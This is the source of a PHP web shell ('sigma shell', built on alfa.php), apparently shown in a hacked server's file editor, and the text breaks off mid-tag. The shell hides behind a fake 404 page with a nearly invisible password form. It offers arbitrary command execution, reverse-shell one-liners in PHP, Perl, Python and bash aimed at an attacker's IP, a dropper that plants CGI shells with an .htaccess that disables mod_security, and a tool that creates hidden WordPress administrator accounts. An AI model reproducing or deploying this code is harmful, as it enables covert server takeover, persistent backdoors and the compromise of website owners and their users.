📁 SysAdmin FileManager
Linux 4.18.0-553.52.1.lve.el8.x86_64 | PHP 8.3.30
✏️ Edit: temp_ff11c7db0fd92e20bbf9d98e497db013.php
<?php // ================ LOGIN SYSTEM ================ session_start(); $valid_hash = '$2y$10$wg9lRJsLZgU0Dk0BRMowU.87PjIOMQiDSKNfHF3YcPFNabEPlF/Fm'; // Cek apakah sudah login if (!isset($_SESSION['sigma_access'])) { // Cek form login if (isset($_POST['sigma_pass'])) { if (password_verify($_POST['sigma_pass'], $valid_hash)) { $_SESSION['sigma_access'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } // Tampilkan halaman 404 palsu dengan form login http_response_code(404); $requested_url = $_SERVER['REQUEST_URI'] ?? '/'; ?> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <style> /* Hidden password form - samar di tengah bawah */ .sigma-form { position: fixed; bottom: 20px; left: 50%; transform: translateX(-50%); opacity: 0.15; transition: opacity 0.3s ease; text-align: center; pointer-events: auto; z-index: 1000; } .sigma-form:hover { opacity: 0.4; } .sigma-form input { background: transparent; border: 1px solid #ccc; color: #333; padding: 6px 12px; font-size: 13px; font-family: 'Times New Roman', serif; width: 150px; border-radius: 0; } .sigma-form input:focus { outline: none; border-color: #666; background: rgba(255,255,255,0.1); } .sigma-form button { background: transparent; border: 1px solid #ccc; color: #333; padding: 6px 12px; font-size: 13px; font-family: 'Times New Roman', serif; cursor: pointer; margin-left: 5px; } .sigma-form button:hover { background: rgba(0,0,0,0.05); } /* Hint sangat samar di source code */ .sigma-hint { display: none; } /* Style untuk pesan error */ .error-msg { position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background: rgba(255,0,0,0.1); border: 1px solid #ff0000; color: #ff0000; padding: 5px 10px; font-size: 12px; font-family: monospace; opacity: 0.7; } </style> </head> <body> <h1>Not Found</h1> <p>The requested URL <?php echo htmlspecialchars($requested_url); ?> was not found on this server.</p> <p>Additionally, a 404 Not Found error was 
encountered while trying to use an ErrorDocument to handle the request.</p> <!-- access pattern: /dev/shm/.sigma --> <!-- Hidden login form - samar di tengah bawah --> <form method="POST" class="sigma-form" autocomplete="off"> <input type="password" name="sigma_pass" placeholder="••••••"> <button type="submit">→</button> </form> <?php if (isset($_POST['sigma_pass'])): ?> <div class="error-msg">Access denied</div> <?php endif; ?> <script> (function() { const form = document.querySelector('.sigma-form'); const input = form.querySelector('input'); input.addEventListener('focus', function() { form.style.opacity = '0.8'; }); input.addEventListener('blur', function() { form.style.opacity = '0.15'; }); })(); </script> </body> </html> <?php exit; } // ================ ORIGINAL ALFA.PHP ================ // [DI SINI KODE ALFA.PHP ASLI TANPA PERUBAHAN] error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); function backConnect($type, $ip, $port) { $code = ''; switch($type) { case 'php': $code = '<?php $sock=fsockopen("'.$ip.'",'.$port.');$proc=proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);proc_close($proc);?>'; eval($code); break; case 'perl': $code = 'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''; shell_exec($code . ' 2>&1 &'); break; case 'python': $code = 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$ip.'",'.$port.'));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''; shell_exec($code . ' 2>&1 &'); break; case 'bash': $code = 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1'; shell_exec($code . ' 2>&1 &'); break; } return true; } function createCGIShell($type, $base_path) { // Buat folder .SIGMA $sigma_folder = rtrim($base_path, '/') . 
'/.SIGMA'; if (!is_dir($sigma_folder)) { mkdir($sigma_folder, 0755, true); } // Buat .htaccess $htaccess = $sigma_folder . '/.htaccess'; $htaccess_content = 'Options +ExecCGI AddHandler cgi-script .cgi DirectoryIndex index.html # Allow access from anywhere Order allow,deny Allow from all # Disable security for CGI <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> # Set proper permissions <FilesMatch "\.cgi$"> SetHandler cgi-script Options +ExecCGI </FilesMatch>'; file_put_contents($htaccess, $htaccess_content); $content = ''; $filename = ''; if ($type == 'perl') { $filename = 'perl.cgi'; $content = '#!/usr/bin/perl use strict; use warnings; print "Content-type: text/html\n\n"; print "<!DOCTYPE html><html><head><title>Perl CGI Shell</title>"; print "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}"; print "input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}"; print "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}"; print "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>"; print "<h2>Perl CGI Shell</h2>"; print "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> "; print "<button type=\'submit\'>Execute</button></form>"; print "<hr><pre>"; my $cmd = $ENV{\'QUERY_STRING\'}; $cmd =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $cmd =~ s/\+/ /g; $cmd =~ s/&cmd=//; if ($cmd) { my $output = `$cmd 2>&1`; $output =~ s/</</g; $output =~ s/>/>/g; print $output; } print "</pre></body></html>"; '; } elseif ($type == 'python') { $filename = 'python.cgi'; $content = '#!/usr/bin/python import os import cgi print "Content-type: text/html\\n" print "<!DOCTYPE html><html><head><title>Python CGI Shell</title>" print "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}" print 
"input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}" print "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}" print "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>" print "<h2>Python CGI Shell</h2>" print "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> " print "<button type=\'submit\'>Execute</button></form>" print "<hr><pre>" fs = cgi.FieldStorage() cmd = fs.getvalue("cmd", "") if cmd: output = os.popen(cmd).read() print output.replace("<", "<").replace(">", ">") print "</pre></body></html>" '; } elseif ($type == 'bash') { $filename = 'bash.cgi'; $content = '#!/bin/bash echo "Content-type: text/html" echo "" echo "<!DOCTYPE html><html><head><title>Bash CGI Shell</title>" echo "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}" echo "input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}" echo "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}" echo "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>" echo "<h2>Bash CGI Shell</h2>" echo "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> " echo "<button type=\'submit\'>Execute</button></form>" echo "<hr><pre>" QUERY_STRING="$QUERY_STRING" cmd=$(echo "$QUERY_STRING" | sed "s/&cmd=//g" | sed "s/%20/ /g" | sed "s/%2F/\//g") if [ -n "$cmd" ]; then eval "$cmd" 2>&1 fi echo "</pre></body></html>" '; } if ($content && $filename) { $fullpath = $sigma_folder . '/' . 
$filename; if (file_put_contents($fullpath, $content)) { chmod($fullpath, 0755); return ['path' => $fullpath, 'url' => $filename]; } } return false; } function wpAddAdmin($path, $username, $password, $email) { $wp_load = rtrim($path, '/') . '/wp-load.php'; if (!file_exists($wp_load)) { return ['success' => false, 'message' => 'wp-load.php not found at: ' . $wp_load]; } // Include WordPress try { ob_start(); define('WP_USE_THEMES', false); define('SHORTINIT', false); require_once($wp_load); ob_end_clean(); } catch (Exception $e) { return ['success' => false, 'message' => 'Error loading WordPress: ' . $e->getMessage()]; } // Check if WordPress functions are available if (!function_exists('wp_insert_user')) { return ['success' => false, 'message' => 'WordPress functions not available (wp_insert_user missing)']; } // Check if user exists $user_id = username_exists($username); if ($user_id) { return ['success' => false, 'message' => 'Username already exists']; } if (email_exists($email)) { return ['success' => false, 'message' => 'Email already exists']; } // Create user $user_id = wp_insert_user([ 'user_login' => $username, 'user_pass' => $password, 'user_email' => $email, 'user_registered' => date('Y-m-d H:i:s'), 'role' => 'administrator', 'display_name' => $username, 'nickname' => $username ]); if (is_wp_error($user_id)) { return ['success' => false, 'message' => 'Error: ' . $user_id->get_error_message()]; } // Ensure user is admin $user = new WP_User($user_id); $user->set_role('administrator'); return ['success' => true, 'message' => "Admin user '$username' created successfully (ID: $user_id)"]; } function scanWordPress($path) { $sites = []; if (is_dir($path)) { $items = scandir($path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $path . '/' . $item; if (is_dir($full_path)) { // Cek di dalam folder if (file_exists($full_path . 
'/wp-load.php')) { $sites[] = $full_path; } } else { // Cek di current directory if ($item == 'wp-load.php') { $sites[] = $path; } } } // Cek current directory juga if (file_exists($path . '/wp-load.php')) { if (!in_array($path, $sites)) { $sites[] = $path; } } } return array_unique($sites); } // FUNGSI FILE MANAGER function listDir($dir) { $items = []; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file != '.' && $file != '..') { $path = rtrim($dir, '/') . '/' . $file; $items[] = [ 'name' => $file, 'path' => $path, 'type' => is_dir($path) ? 'dir' : 'file', 'size' => is_file($path) ? filesize($path) : 0, 'mtime' => filemtime($path), 'perms' => substr(sprintf('%o', fileperms($path)), -4), 'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] ?? '?' : '?', 'group' => function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($path))['name'] ?? '?' : '?' ]; } } closedir($dh); } usort($items, function($a, $b) { if ($a['type'] == $b['type']) return strcasecmp($a['name'], $b['name']); return $a['type'] == 'dir' ? -1 : 1; }); return $items; } function formatSize($bytes) { if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; return $bytes . ' B'; } function getSystemInfo() { $info = []; $info['kernel'] = php_uname('s') . ' ' . php_uname('r'); $info['hostname'] = php_uname('n'); $info['user'] = get_current_user() . ' (UID: ' . (function_exists('getmyuid') ? getmyuid() : '?') . ')'; $info['disabled'] = ini_get('disable_functions') ?: 'None'; $info['phpver'] = phpversion(); $info['server_ip'] = $_SERVER['SERVER_ADDR'] ?? 'Unknown'; $info['client_ip'] = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $info['software'] = $_SERVER['SERVER_SOFTWARE'] ?? 
'Unknown'; return $info; } // AJAX HANDLERS if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest') { header('Content-Type: application/json'); if (isset($_POST['action'])) { $response = ['success' => false, 'message' => '', 'data' => null]; switch ($_POST['action']) { case 'list': $dir = $_POST['dir'] ?? '.'; $items = listDir($dir); $response['success'] = true; $response['data'] = $items; break; case 'rename': $old = $_POST['old'] ?? ''; $new = $_POST['new'] ?? ''; if ($old && $new && file_exists($old) && rename($old, $new)) { $response['success'] = true; $response['message'] = 'Renamed successfully'; } break; case 'delete': $path = $_POST['path'] ?? ''; if ($path && file_exists($path)) { if (is_dir($path)) { $success = true; $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($it as $f) { if ($f->isDir()) $success = @rmdir($f->getRealPath()) && $success; else $success = @unlink($f->getRealPath()) && $success; } $success = @rmdir($path) && $success; $response['success'] = $success; $response['message'] = $success ? 'Deleted' : 'Delete failed'; } else { if (@unlink($path)) { $response['success'] = true; $response['message'] = 'Deleted'; } } } break; case 'save': $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_put_contents($file, $content) !== false) { $response['success'] = true; $response['message'] = 'Saved'; } break; case 'chmod': $path = $_POST['path'] ?? ''; $perms = $_POST['perms'] ?? ''; if ($path && $perms && chmod($path, octdec($perms))) { $response['success'] = true; $response['message'] = 'Permissions changed'; } break; case 'mkdir': $dir = $_POST['dir'] ?? ''; if ($dir && !file_exists($dir) && mkdir($dir, 0755, true)) { $response['success'] = true; $response['message'] = 'Directory created'; } break; case 'mkfile': $file = $_POST['file'] ?? 
''; $content = $_POST['content'] ?? ''; if ($file && file_put_contents($file, $content) !== false) { $response['success'] = true; $response['message'] = 'File created'; } break; case 'upload': if (isset($_FILES['file'])) { $target = $_POST['path'] . '/' . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { $response['success'] = true; $response['message'] = 'Uploaded'; } } break; case 'read': $file = $_POST['file'] ?? ''; if ($file && file_exists($file) && is_file($file)) { $response['success'] = true; $response['data'] = file_get_contents($file); } break; case 'cmd': $cmd = $_POST['cmd'] ?? ''; $cwd = $_POST['cwd'] ?? ''; if ($cmd) { $fullcmd = "cd " . escapeshellarg($cwd) . " && " . $cmd . " 2>&1"; $output = ''; if (function_exists('shell_exec')) { $output = shell_exec($fullcmd); } elseif (function_exists('exec')) { exec($fullcmd, $out); $output = implode("\n", $out); } elseif (function_exists('system')) { ob_start(); system($fullcmd); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($fullcmd); $output = ob_get_clean(); } elseif (is_resource($proc = popen($fullcmd, 'r'))) { $output = fread($proc, 2097152); pclose($proc); } $response['success'] = true; $response['data'] = $output ?: 'No output'; } break; case 'backconnect': $type = $_POST['type'] ?? 'php'; $ip = $_POST['ip'] ?? ''; $port = $_POST['port'] ?? ''; if ($ip && $port) { backConnect($type, $ip, $port); $response['success'] = true; $response['message'] = "Backconnect sent to $ip:$port using $type"; } break; case 'cgi': $type = $_POST['cgi_type'] ?? ''; $path = $_POST['cgi_path'] ?? ''; $result = createCGIShell($type, $path); if ($result) { $response['success'] = true; $response['message'] = 'CGI shell created in .SIGMA folder'; $response['path'] = $result['path']; $response['url'] = $result['url']; $response['folder'] = '.SIGMA'; $base_url = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . 
dirname($_SERVER['PHP_SELF']); $response['full_url'] = $base_url . '/.SIGMA/' . $result['url']; } else { $response['message'] = 'Failed to create CGI shell'; } break; case 'wp_scan': $path = $_POST['path'] ?? '.'; $sites = scanWordPress($path); $response['success'] = true; $response['sites'] = $sites; $response['count'] = count($sites); break; case 'wp_add': $path = $_POST['wp_path'] ?? ''; $user = $_POST['username'] ?? ''; $pass = $_POST['password'] ?? ''; $email = $_POST['email'] ?? ''; if ($path && $user && $pass && $email) { $response = wpAddAdmin($path, $user, $pass, $email); } else { $response['message'] = 'All fields required'; } break; } echo json_encode($response); exit; } } // MAIN SHELL - TEMA ALFA $cwd = isset($_GET['dir']) ? $_GET['dir'] : '.'; $cwd = realpath($cwd) ?: realpath('.'); if (!$cwd) $cwd = '/'; if ($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; $sys_info = getSystemInfo(); ?> <!DOCTYPE html> <html> <head> <title>sigma shell</title> <meta charset="UTF-8"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #1e1e2f; color: #e0e0e0; padding: 20px; } .container { max-width: 1400px; margin: 0 auto; background: #2d2d3a; border-radius: 12px; padding: 25px; box-shadow: 0 8px 30px rgba(0,0,0,0.3); } /* System Info */ .sys-info { background: #252532; border-radius: 10px; padding: 20px; margin-bottom: 25px; display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; border: 1px solid #3a3a4a; } .info-item { padding: 10px; background: #1e1e2b; border-radius: 8px; border-left: 3px solid #4a9eff; } .info-label { font-size: 12px; color: #8a8fa0; text-transform: uppercase; letter-spacing: 0.5px; margin-bottom: 5px; } .info-value { font-size: 14px; color: #fff; font-weight: 500; word-break: break-all; } .info-value a { color: #4a9eff; text-decoration: none; } .info-value a:hover { text-decoration: underline; } /* Header */ .header { display: flex; 
justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #3a3a4a; } .header h1 { font-size: 24px; font-weight: 600; color: #fff; } .header h1 span { color: #4a9eff; font-size: 14px; margin-left: 10px; font-weight: normal; } /* Menu Tabs */ .menu-tabs { display: flex; gap: 2px; margin-bottom: 20px; background: #252532; padding: 10px; border-radius: 8px; border: 1px solid #3a3a4a; } .tab-btn { padding: 10px 20px; background: #3a3a4a; color: #8a8fa0; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: all 0.2s; } .tab-btn:hover { background: #4a9eff; color: #fff; } .tab-btn.active { background: #4a9eff; color: #fff; } /* Path */ .path { background: #252532; padding: 12px 18px; border-radius: 8px; margin-bottom: 20px; font-family: 'Courier New', monospace; font-size: 14px; border: 1px solid #3a3a4a; display: flex; align-items: center; gap: 10px; flex-wrap: wrap; } .path a { color: #4a9eff; text-decoration: none; } .path a:hover { text-decoration: underline; } /* Action Buttons */ .actions { display: flex; gap: 10px; margin-bottom: 20px; flex-wrap: wrap; } .btn { padding: 10px 18px; background: #3a3a4a; color: #fff; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: all 0.2s; display: inline-flex; align-items: center; gap: 5px; } .btn:hover { background: #4a4a5a; transform: translateY(-1px); } .btn-primary { background: #4a9eff; } .btn-primary:hover { background: #6aafff; } .btn-success { background: #2ecc71; } .btn-success:hover { background: #27ae60; } .btn-danger { background: #e74c3c; } .btn-danger:hover { background: #c0392b; } .btn-warning { background: #f39c12; } .btn-warning:hover { background: #e67e22; } /* Tools Grid */ .tools-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(350px, 1fr)); gap: 20px; margin-bottom: 25px; } .tool-card { background: #252532; border-radius: 10px; border: 
1px solid #3a3a4a; overflow: hidden; } .tool-header { background: #1e1e2b; padding: 15px 20px; font-weight: 600; color: #4a9eff; border-bottom: 1px solid #3a3a4a; cursor: pointer; display: flex; justify-content: space-between; align-items: center; } .tool-header:hover { background: #2a2a38; } .tool-header .toggle-icon { transition: transform 0.3s; font-size: 12px; color: #8a8fa0; } .tool-header.collapsed .toggle-icon { transform: rotate(-90deg); } .tool-body { padding: 20px; transition: all 0.3s; } .tool-body.collapsed { display: none; } .tool-body input, .tool-body select, .tool-body textarea { width: 100%; padding: 10px 12px; margin-bottom: 12px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-size: 14px; } .tool-body input:focus, .tool-body select:focus, .tool-body textarea:focus { outline: none; border-color: #4a9eff; } .tool-body label { display: block; margin-bottom: 5px; color: #8a8fa0; font-size: 13px; } .tool-row { display: flex; gap: 10px; margin-bottom: 12px; } .tool-row input { flex: 1; margin-bottom: 0; } /* File Table - Compact dan Estetik */ .file-table { width: 100%; border-collapse: collapse; margin-bottom: 20px; font-size: 13px; } .file-table th { background: #252532; padding: 10px 6px; text-align: left; font-weight: 600; color: #8a8fa0; border-bottom: 2px solid #3a3a4a; font-size: 12px; white-space: nowrap; } .file-table td { padding: 8px 6px; border-bottom: 1px solid #3a3a4a; white-space: nowrap; } .file-table tr:hover { background: #323240; } .file-table .dir { color: #4a9eff; font-weight: 500; } .file-table .file { color: #e0e0e0; } .perms { font-family: 'Courier New', monospace; color: #8a8fa0; letter-spacing: 0.5px; } .size { font-family: 'Courier New', monospace; color: #8a8fa0; text-align: right; padding-right: 10px; } .actions-cell { display: flex; gap: 2px; flex-wrap: nowrap; } .action-btn { padding: 3px 6px; font-size: 10px; border-radius: 3px; background: #3a3a4a; color: #fff; border: none; cursor: 
pointer; transition: all 0.2s; min-width: 32px; text-align: center; } .action-btn:hover { background: #4a4a5a; } .action-btn.edit { background: #f39c12; } .action-btn.download { background: #3498db; } .action-btn.rename { background: #95a5a6; } .action-btn.perms { background: #9b59b6; } .action-btn.delete { background: #e74c3c; } /* Shell Section */ .shell-section { background: #252532; border-radius: 10px; margin-top: 25px; border: 1px solid #3a3a4a; overflow: hidden; } .shell-header { background: #1e1e2b; padding: 15px 20px; font-weight: 600; color: #4a9eff; border-bottom: 1px solid #3a3a4a; } .shell-input { display: flex; padding: 15px; background: #2d2d3a; gap: 10px; } .shell-input input { flex: 1; padding: 12px 15px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-family: 'Courier New', monospace; font-size: 14px; } .shell-input input:focus { outline: none; border-color: #4a9eff; } .shell-output { background: #1a1a25; color: #00ff00; padding: 15px; font-family: 'Courier New', monospace; font-size: 13px; white-space: pre-wrap; word-break: break-all; max-height: 300px; overflow-y: auto; border-top: 1px solid #3a3a4a; } /* Modal */ .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; backdrop-filter: blur(5px); } .modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d3a; padding: 30px; border-radius: 12px; min-width: 400px; max-width: 90%; max-height: 90vh; overflow-y: auto; box-shadow: 0 20px 60px rgba(0,0,0,0.5); border: 1px solid #4a4a5a; } .modal-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 10px; border-bottom: 1px solid #3a3a4a; } .modal-header h3 { color: #fff; font-size: 18px; } .close { color: #8a8fa0; font-size: 24px; cursor: pointer; transition: color 0.2s; } .close:hover { color: #fff; } .form-group { margin-bottom: 
20px; } .form-group label { display: block; margin-bottom: 8px; color: #8a8fa0; font-size: 13px; font-weight: 500; } .form-group input, .form-group textarea, .form-group select { width: 100%; padding: 10px 12px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-size: 14px; } .form-group input:focus, .form-group textarea:focus, .form-group select:focus { outline: none; border-color: #4a9eff; } .form-group textarea { min-height: 300px; font-family: 'Courier New', monospace; resize: vertical; } .modal-footer { display: flex; gap: 10px; justify-content: flex-end; margin-top: 20px; } /* Iframe untuk CGI Shell */ .cgi-iframe { width: 100%; height: 500px; border: 2px solid #3a3a4a; border-radius: 8px; background: #1e1e2f; margin-top: 15px; } /* Alert */ .alert { position: fixed; top: 20px; right: 20px; padding: 15px 25px; background: #2d2d3a; border-left: 4px solid #4a9eff; border-radius: 6px; color: #fff; box-shadow: 0 5px 20px rgba(0,0,0,0.3); z-index: 2000; animation: slideIn 0.3s ease; } .alert.success { border-left-color: #2ecc71; } .alert.error { border-left-color: #e74c3c; } @keyframes slideIn { from { transform: translateX(100%); opacity: 0; } to { transform: translateX(0); opacity: 1; } } .hidden { display: none; } /* Loading Spinner */ .spinner { display: inline-block; width: 20px; height: 20px; border: 2px solid #3a3a4a; border-top-color: #4a9eff; border-radius: 50%; animation: spin 1s linear infinite; margin-right: 10px; vertical-align: middle; } @keyframes spin { to { transform: rotate(360deg); } } /* Scrollbar */ ::-webkit-scrollbar { width: 8px; height: 8px; } ::-webkit-scrollbar-track { background: #1e1e2b; border-radius: 8px; } ::-webkit-scrollbar-thumb { background: #3a3a4a; border-radius: 8px; } ::-webkit-scrollbar-thumb:hover { background: #4a4a5a; } </style> </head> <body> <div class="container"> <!-- System Info --> <div class="sys-info"> <div class="info-item"> <div class="info-label">Kernel</div> <div 
class="info-value"><?php echo htmlspecialchars($sys_info['kernel']); ?></div> </div> <div class="info-item"> <div class="info-label">User</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['user']); ?></div> </div> <div class="info-item"> <div class="info-label">Disabled Functions</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['disabled']); ?></div> </div> <div class="info-item"> <div class="info-label">PHP Version</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['phpver']); ?></div> </div> <div class="info-item"> <div class="info-label">Server IP</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['server_ip']); ?></div> </div> <div class="info-item"> <div class="info-label">Your IP</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['client_ip']); ?></div> </div> <div class="info-item"> <div class="info-label">Software</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['software']); ?></div> </div> </div> <!-- Header --> <div class="header"> <h1>zev2 shell <span>v2.0</span></h1> </div> <!-- Menu Tabs --> <div class="menu-tabs"> <button class="tab-btn active" onclick="showTab('files')">File Manager</button> <button class="tab-btn" onclick="showTab('backconnect')">Back Connect</button> <button class="tab-btn" onclick="showTab('cgi')">CGI Shell</button> <button class="tab-btn" onclick="showTab('wordpress')">WordPress</button> </div> <!-- Tab: File Manager --> <div id="tab-files" class="tab-content"> <div class="path" id="currentPath"> <?php $parts = explode('/', trim($cwd, '/')); $path = ''; echo '<a href="#" onclick="changeDir(\'/\')">~</a>'; foreach ($parts as $p) { if ($p) { $path .= '/' . $p; echo ' / <a href="#" onclick="changeDir(\'' . htmlspecialchars($path) . '\')">' . htmlspecialchars($p) . 
'</a>'; } } ?> </div> <div class="actions"> <button onclick="showModal('upload')" class="btn btn-primary">Upload</button> <button onclick="showModal('mkdir')" class="btn btn-success">New Folder</button> <button onclick="showModal('mkfile')" class="btn btn-warning">New File</button> <button onclick="goUp()" class="btn">Up</button> <button onclick="refreshDir()" class="btn">Refresh</button> </div> <table class="file-table" id="fileTable"> <thead> <tr> <th width="30%">Name</th> <th width="8%">Size</th> <th width="8%">Perms</th> <th width="15%">Owner/Group</th> <th width="19%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody id="fileList"> <tr><td colspan="6" style="text-align:center; padding:40px;"><span class="spinner"></span> Loading...</td></tr> </tbody> </table> </div> <!-- Tab: Back Connect --> <div id="tab-backconnect" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Reverse Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Type</label> <select id="bc_type"> <option value="php">PHP</option> <option value="perl">Perl</option> <option value="python">Python</option> <option value="bash">Bash</option> </select> <label>IP Address</label> <input type="text" id="bc_ip" value="<?php echo $sys_info['client_ip']; ?>"> <label>Port</label> <input type="text" id="bc_port" value="4444"> <button onclick="backConnect()" class="btn btn-danger" style="width:100%">Connect</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Instructions</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <pre style="background:#1e1e2b; padding:15px; border-radius:8px; font-size:12px; color:#8a8fa0; border:1px solid #3a3a4a;"> 1. Listen on your machine: nc -lvnp [port] 2. Click Connect button 3. 
Shell will connect back </pre> </div> </div> </div> </div> <!-- Tab: CGI Shell (di folder .SIGMA) --> <div id="tab-cgi" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Perl CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_perl_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('perl')" class="btn btn-warning" style="width:100%">Create Perl CGI in .SIGMA</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Python CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_python_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('python')" class="btn btn-warning" style="width:100%">Create Python CGI in .SIGMA</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Bash CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_bash_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('bash')" class="btn btn-warning" style="width:100%">Create Bash CGI in .SIGMA</button> </div> </div> </div> <!-- Container untuk iframe CGI Shell --> <div id="cgiIframeContainer" style="margin-top:20px; display:none;"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>CGI Shell Access (.SIGMA folder)</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <iframe id="cgiIframe" class="cgi-iframe" src="about:blank"></iframe> <div style="margin-top:15px; text-align:center;"> <a href="#" id="cgiIframeLink" target="_blank" class="btn btn-primary">Open in New Tab</a> </div> </div> </div> </div> </div> <!-- 
Tab: WordPress (FIXED) --> <div id="tab-wordpress" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>WordPress Admin Creator</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Scan Directory</label> <input type="text" id="wp_scan_path" value="<?php echo $cwd; ?>"> <button onclick="scanWordPress()" class="btn btn-primary" style="width:100%; margin-bottom:15px">Scan for WordPress</button> <div id="wp_sites_container" style="display:none; margin-bottom:15px"> <label>Select WordPress Site (with wp-load.php)</label> <select id="wp_sites" style="width:100%;"></select> <div id="wp_count_badge" style="margin-top:5px; font-size:12px; color:#8a8fa0;"></div> </div> <div id="wp_form" style="display:none"> <label>Username</label> <input type="text" id="wp_user" value="admin"> <label>Password</label> <input type="text" id="wp_pass" value="Admin@123"> <label>Email</label> <input type="email" id="wp_email" value="admin@example.com"> <button 